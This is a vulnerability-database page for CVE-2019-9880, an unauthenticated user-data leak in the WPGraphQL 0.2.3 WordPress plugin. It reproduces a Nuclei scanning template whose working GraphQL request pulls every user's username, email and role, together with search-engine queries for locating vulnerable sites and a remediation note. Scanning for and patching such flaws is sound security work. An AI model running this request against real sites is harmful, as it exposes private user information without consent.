CVE-2019-9880: WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure

日期: 2025-08-01 | 影响软件: WPEngine WPGraphQL | POC: 已公开

漏洞描述

An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible, for an unauthenticated attacker, to retrieve all WordPress users details such as email address, role, and username.

PoC代码[已公开]

id: CVE-2019-9880

info:
  name: WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure
  author: intelligent-ears
  severity: critical
  description: |
    An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible, for an unauthenticated attacker, to retrieve all WordPress users details such as email address, role, and username.
  impact: |
    An attacker can exploit this vulnerability to enumerate all WordPress users and extract sensitive information including email addresses, usernames, and user roles without authentication.
  remediation: |
    Update WPGraphQL to version 0.3.0 or later to fix this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.html
    - https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
    - https://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0
    - https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2019-9880
    cwe-id: CWE-306
    epss-score: 0.48585
    epss-percentile: 0.97684
    cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpengine
    product: wpgraphql
    framework: wordpress
    fofa-query: body="/wp-content/plugins/wp-graphql/"
    publicwww-query: "/wp-content/plugins/wp-graphql/"
  tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak

http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query": "query { users { nodes { id name email username roles } } }"}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "{\"data\":{", "\"name\":", "\"roles\":")
          - contains(content_type, "application/json")
          - status_code == 200
        condition: and

    extractors:
      - type: json
        name: user-data
        json:
          - '.data.users.nodes[] | "username: " + .username + ", email: " + .email'
# digest: 490a00463044022036c5a5b8d8f866805a08535ce3877e72abdf7e2bab3ac523af862f62baff6cc102205f25fa66c75cccc7b29e080bf5ecb09e902cc6d77466eccd1bf4c00d8f5a4d59:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9880.yaml

相关漏洞推荐